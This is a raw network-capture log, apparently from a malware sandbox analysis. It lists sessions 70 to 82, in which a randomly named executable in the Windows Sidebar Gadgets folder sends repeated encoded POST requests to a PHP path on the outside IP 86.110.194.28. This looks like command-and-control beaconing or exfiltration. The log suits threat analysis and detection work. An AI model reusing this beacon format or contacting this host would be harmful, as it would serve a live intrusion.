70 | 192.168.2.4 | 49950 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:21.665700912 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:08:22.020644903 CET | 2576 | OUT | Data Raw: 5b 55 5e 5d 5d 5a 50 51 54 5b 59 5a 5b 5e 57 5c 5f 51 5a 5c 52 5d 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [U^]]ZPQT[YZ[^W\_QZ\R]PF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E<>#9$T&/,*+>[$4*1*65U ([$*'0'+9#Y'$X.
Jan 3, 2025 09:08:22.352859974 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:22.482733965 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:22 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.4 | 49955 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:22.647787094 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:23.006690979 CET2576OUTData Raw: 5b 5d 5e 5f 58 58 50 5e 54 5b 59 5a 5b 52 57 5c 5f 50 5a 5a 52 5d 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^_XXP^T[YZ[RW\_PZZR]PC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(X-_",W&<#(+6Z$=]&?!!T ?39@&/ ?#Y'$X.5
Jan 3, 2025 09:08:23.484846115 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:23.614218950 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:23 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.4 | 49961 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:23.739649057 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:24.098089933 CET2576OUTData Raw: 5e 51 5e 50 58 5b 50 5c 54 5b 59 5a 5b 5e 57 52 5f 51 5a 5e 52 56 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^PX[P\T[YZ[^WR_QZ^RVPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D(X)\":8R2Z0C)6^$9]&?5V 4"#(Y3,E'#<9#Y'$X.
Jan 3, 2025 09:08:24.448956013 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:24.581724882 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:24 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.4 | 49970 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:24.666712999 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2152
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.4 | 49971 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:24.707673073 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:08:25.066873074 CET2576OUTData Raw: 5e 51 5e 5e 58 58 50 5d 54 5b 59 5a 5b 5f 57 5a 5f 5c 5a 55 52 56 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^^XXP]T[YZ[_WZ_\ZURVPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<*":$1<*>X3B)%?26$)W7<09#'(#Y'$X.
Jan 3, 2025 09:08:25.422988892 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:25.554112911 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:25 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.4 | 49978 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:26.058409929 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:26.410731077 CET2576OUTData Raw: 5e 56 5e 59 58 57 55 5c 54 5b 59 5a 5b 5e 57 59 5f 50 5a 5a 52 5c 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V^YXWU\T[YZ[^WY_PZZR\PC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%)>&6*(W1#=;>3=%<* 44(')<3#+#Y'$X.
Jan 3, 2025 09:08:26.753954887 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:26.885750055 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:26 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.4 | 49988 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:27.003273010 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:27.348124981 CET2576OUTData Raw: 5b 56 5e 50 58 5a 55 5a 54 5b 59 5a 5b 5e 57 5b 5f 52 5a 54 52 52 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^PXZUZT[YZ[^W[_RZTRRP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D<>6)#&8)(1%$625Q!'5#($]'*;0$U?#Y'$X.
Jan 3, 2025 09:08:27.706213951 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:27.837898970 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:27 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.4 | 49995 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:27.961170912 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:08:28.316889048 CET2576OUTData Raw: 5b 57 5e 5f 5d 59 50 5b 54 5b 59 5a 5b 56 57 5b 5f 53 5a 55 52 52 50 41 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^_]YP[T[YZ[VW[_SZURRPA_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&<16'2<;=%09\%=S!7<3 3(T<9#Y'$X.%
Jan 3, 2025 09:08:28.646914005 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:28.773509979 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:28 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.4 | 49997 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:29.037929058 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:29.394984961 CET | 2576 | OUT | Data Raw: 5b 54 5e 50 58 58 50 51 54 5b 59 5a 5b 52 57 5e 5f 52 5a 5a 52 57 50 45 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^PXXPQT[YZ[RW^_RZZRWPE_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(#) W1? A=;_$B=Z2)V $)V!8[$9;'/V()#Y'$X.5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.4 | 50002 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:29.713927031 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:30.066910028 CET | 2164 | OUT | Data Raw: 5e 51 5b 5a 58 57 55 5a 54 5b 59 5a 5b 54 57 5c 5f 54 5a 5f 52 53 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q[ZXWUZT[YZ[TW\_TZ_RSPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&B?>16$%,/=;"X$4:&/26B=78$X'D&?0W?9#Y'$X.-
Jan 3, 2025 09:08:30.420988083 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:30.552973032 CET | 380 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:30 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                  Content-Length: 152
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 0d 1d 27 02 25 28 39 03 28 3f 3f 13 25 55 35 11 21 1e 0a 15 2e 20 32 45 22 2c 21 1c 31 3b 0e 50 3c 2d 36 08 28 33 39 50 23 3d 21 1f 2b 30 28 5d 03 10 39 5a 3d 2e 2c 04 2a 10 07 5e 2d 0e 2f 5a 33 51 2b 00 29 1d 04 09 26 2f 29 0a 22 2d 27 53 3d 23 3e 00 30 05 0e 5f 2b 20 37 5a 25 3d 20 54 0b 17 24 09 33 0e 01 58 26 5e 26 03 29 37 2b 01 30 3a 3a 0b 21 2c 32 1b 20 29 2f 03 2f 1e 26 0d 30 06 0f 54 2a 2d 37 55 32 3a 0f 01 27 11 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '%(9(??%U5!. 2E",!1;P<-6(39P#=!+0(]9Z=.,*^-/Z3Q+)&/)"-'S=#>0_+ 7Z%= T$3X&^&)7+0::!,2 )//&0T*-7U2:'.\#(U4WP


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
80 | 192.168.2.4 | 50008 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:29.835786104 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:30.191869974 CET | 2576 | OUT | Data Raw: 5b 52 5e 5c 58 5d 50 51 54 5b 59 5a 5b 52 57 5b 5f 52 5a 5f 52 53 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R^\X]PQT[YZ[RW[_RZ_RSPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&?1\"9#1'="^$B9X&<&5'9Q ?'',$U?#Y'$X.5
Jan 3, 2025 09:08:30.512769938 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:30.642127037 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:30 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
81 | 192.168.2.4 | 50014 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:30.790406942 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:08:31.149127007 CET | 2576 | OUT | Data Raw: 5b 57 5e 5f 58 57 50 5e 54 5b 59 5a 5b 5f 57 5e 5f 54 5a 5d 52 5c 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^_XWP^T[YZ[_W^_TZ]R\P@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+X*59 U2<>;3%]',66"78Z$@0?+?#Y'$X.
Jan 3, 2025 09:08:31.489546061 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:31.624754906 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:31 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
82 | 192.168.2.4 | 50018 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:31.899090052 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:08:32.254656076 CET | 2576 | OUT | Data Raw: 5e 51 5e 51 58 58 50 59 54 5b 59 5a 5b 51 57 5d 5f 56 5a 5d 52 57 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^QXXPYT[YZ[QW]_VZ]RWPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+5_"(2?<A(;504:2<= 4)V!; '*40?W+9#Y'$X.9
Jan 3, 2025 09:08:32.596971989 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:32.727794886 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:32 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
